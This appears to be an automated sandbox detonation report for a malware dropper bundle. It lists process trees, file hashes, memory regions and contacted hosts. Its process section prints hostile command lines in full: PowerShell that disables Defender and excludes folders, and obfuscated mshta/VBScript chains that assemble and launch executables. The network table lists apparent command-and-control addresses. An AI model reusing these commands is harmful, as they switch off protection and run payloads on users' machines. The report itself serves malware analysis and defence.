Tue1968b7ee9058232e8.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe
Tue193129b31e741ef3.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe
Tue19c9e031f4.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe
Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe
Tue192c34b1c2f5.exe /mixone
C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp" /SL5="$9018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe"
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe
"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe
Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 492
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe
"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp" /SL5="$A018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue1932df4dae.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1366178986-1427971907365777778-448785540-1847609419-164699858-18581328-2048674840"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| NL | 45.9.20.13:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| N/A | 127.0.0.1:49286 | tcp | |
| N/A | 127.0.0.1:49289 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
| MD5 | c10ba859e90df8a8d8e7dcc8dfe5ac20 |
| SHA1 | 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5 |
| SHA256 | 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023 |
| SHA512 | 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a |
\Users\Admin\AppData\Local\Temp\7zS45B58177\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/2704-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2704-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-80-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2704-79-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2704-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe
| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe
| MD5 | 8b6f3a6e8d9797093a78f0b85da4a1fc |
| SHA1 | 2f8346a3ec3427c5a7681d166501f8f42f620b3b |
| SHA256 | 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8 |
| SHA512 | c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef |
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
memory/2416-129-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2496-172-0x0000000000F90000-0x0000000001000000-memory.dmp
memory/1732-171-0x00000000000F0000-0x0000000000108000-memory.dmp
memory/1404-170-0x0000000001040000-0x00000000010B2000-memory.dmp
memory/612-169-0x00000000001B0000-0x0000000000220000-memory.dmp
memory/3004-161-0x0000000001100000-0x0000000001108000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QHCI5ZEFY7UWVY6YVHV6.temp
| MD5 | 00e1d8a2561474249aa2e4c9f3a32715 |
| SHA1 | a36897c95f9eeba324e6b9b40eb4c7ab56dcac4b |
| SHA256 | b98d635c0058a69854824001b6dbedfb3e13923b4e5afb5ef670967393cfc3f3 |
| SHA512 | 0edcbaba2058e1a9c545a6b7eaf880f92f40ab9134ea938a6f1a60fad001ccfd582e36d381dff55b863c7f38aacf49e5113d6763b10622965ccdaebd9122d641 |
memory/1408-193-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2416-192-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1724-191-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/1732-199-0x0000000000430000-0x0000000000436000-memory.dmp
memory/2704-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-77-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-76-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2380-202-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/2704-217-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-221-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2704-220-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-219-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2704-218-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-215-0x0000000000400000-0x000000000051C000-memory.dmp
memory/560-225-0x00000000023A0000-0x0000000002590000-memory.dmp
memory/1280-226-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/2600-227-0x0000000000400000-0x0000000002F22000-memory.dmp
memory/2436-247-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2948-265-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2436-268-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2948-267-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2436-263-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2948-262-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2948-261-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2436-260-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2436-259-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2948-257-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2948-255-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2948-253-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2436-249-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2436-245-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2436-243-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-275-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-278-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-277-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2704-276-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-273-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2704-269-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2560-280-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1408-279-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2560-284-0x0000000002DA0000-0x0000000002EFC000-memory.dmp
memory/2560-283-0x0000000002AD0000-0x0000000002C2C000-memory.dmp
memory/2844-292-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2844-300-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2844-290-0x0000000000400000-0x0000000000422000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:28
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
